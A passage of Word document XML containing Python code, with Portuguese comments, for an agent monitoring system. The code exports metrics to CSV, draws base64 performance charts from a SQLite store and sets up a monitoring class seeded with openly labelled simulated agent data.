    <w:p w14:paraId="024F0810" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if agent_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF50A5B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metrics = self.db.get_agent_metrics(agent_id, hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9B15E8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA455C1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            conn = sqlite3.connect(self.db.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A72E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695EA33" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            since = datetime.now() - timedelta(hours=hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40464C71" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cursor.execute("SELECT * FROM metrics WHERE timestamp &gt;= ?", (since,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF6171" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            columns = [desc[0] for desc in cursor.description]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A1672" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metrics = [dict(zip(columns, row)) for row in cursor.fetchall()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC10EB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1EACE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F995CF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if not metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F51027" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E795580" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1E537" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        output = io.StringIO()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62536763" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        writer = csv.DictWriter(output, fieldnames=metrics[0].keys())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B23D46" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        writer.writeheader()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E56705" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        writer.writerows(metrics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FADF452" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82CEE6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return output.getvalue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848109E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB246AE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def generate_performance_chart(self, agent_id: str, hours: int = 24) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E4D6A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Gera gráfico de performance em base64"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FCAAEE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        metrics = self.db.get_agent_metrics(agent_id, hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63365AFA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D25F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if len(metrics) &lt; 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5C228" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E63B11" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4374E067" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Filtrar métricas de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D1B877" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        performance_data = [(datetime.fromisoformat(m['timestamp']), m['value']) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099EA066" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                          for m in metrics if m['metric_name'] == 'performance_score']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C2393" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D92EC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if len(performance_data) &lt; 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA3D60" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22017D52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31666B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Ordenar por timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832D01E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        performance_data.sort(key=lambda x: x[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1066E00D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ADFB55" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        timestamps, values = zip(*performance_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FD6F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3617C5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Criar gráfico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AC533" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.figure(figsize=(12, 6))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EABE6D4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.plot(timestamps, values, 'b-', linewidth=2, marker='o', markersize=4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C340CA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.title(f'Performance do Agente {agent_id} - Últimas {hours}h', fontsize=14, fontweight='bold')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14993CE8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.xlabel('Tempo')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C25A9C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.ylabel('Performance (%)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1AF3B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.grid(True, alpha=0.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510422D8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9AC3C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Formatação do eixo X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1145A0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%H:%M'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8DE11" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.gca().xaxis.set_major_locator(mdates.HourLocator(interval=2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525C354D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.xticks(rotation=45)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3675A004" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59889983" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Adicionar linha de tendência</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68760B2F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        x_numeric = mdates.date2num(timestamps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397E6B0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        z = np.polyfit(x_numeric, values, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4579B4E5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        p = np.poly1d(z)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D8F8E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.plot(timestamps, p(x_numeric), "r--", alpha=0.8, linewidth=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1916AD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387A765" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.tight_layout()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D782D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29682FD0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Converter para base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF13C2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        buffer = io.BytesIO()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5C11D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.savefig(buffer, format='png', dpi=150, bbox_inches='tight')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EE1B85" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        buffer.seek(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2C10A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        image_base64 = base64.b64encode(buffer.getvalue()).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD48E73" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        plt.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169A83F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6843E5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return image_base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740154D9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="7220EC8F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="74202128" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class RealTimeMonitoringSystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4FB70" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Sistema principal de monitoramento em tempo real"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474EAD90" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306537CB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361A2F5A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.db = MetricsDatabase()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259769E9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.analytics = RealTimeAnalytics(self.db)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6DDCC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.active_agents: Set[str] = set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34379FE5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.metrics_queue: deque = deque(maxlen=10000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FDE44A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.websocket_clients: Set = set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2BCB64" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.monitoring_active = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A26935E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.monitoring_thread = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F06766" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB7D42" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Simulação de dados reais (em produção, viria dos agentes reais)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C13894" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.simulated_agents = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A432F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "coordinator": {"base_performance": 95.0, "base_response_time": 150},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D435C0F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "analytics_001": {"base_performance": 88.0, "base_response_time": 280},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2F85BC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "optimizer_001": {"base_performance": 92.0, "base_response_time": 320},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A78C7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "security_001": {"base_performance": 96.0, "base_response_time": 180},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66685151" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "learner_001": {"base_performance": 85.0, "base_response_time": 450},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B048743" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "data_001": {"base_performance": 94.0, "base_response_time": 95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5F254" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "monitor_001": {"base_performance": 98.0, "base_response_time": 65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE43F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "evolving_001": {"base_performance": 82.0, "base_response_time": 1200}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1AD67" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75560003" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4B6AC0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Contadores de ciclos reais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B3BAB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.evolution_cycles = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CC298" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "coordinator": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16023942" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "analytics_001": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B4C00" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "optimizer_001": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F9097" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "security_001": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDABC9C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "learner_001": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318278A6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "data_001": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755B592F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "monitor_001": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C795AF5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "evolving_001": 47  # Começar com alguns ciclos já realizados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A33EA5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA73163" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E5697" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def start_monitoring(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ECBE76" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Inicia o sistema de monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53AC61" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.monitoring_active = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3808D437" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.monitoring_thread = threading.Thread(target=self._monitoring_loop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C206B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.monitoring_thread.daemon = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F877D6E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.monitoring_thread.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE3C997" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB97D85" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.info("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sistema de monitoramento em tempo real iniciado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73114515" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78943AE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def stop_monitoring(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A39424" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
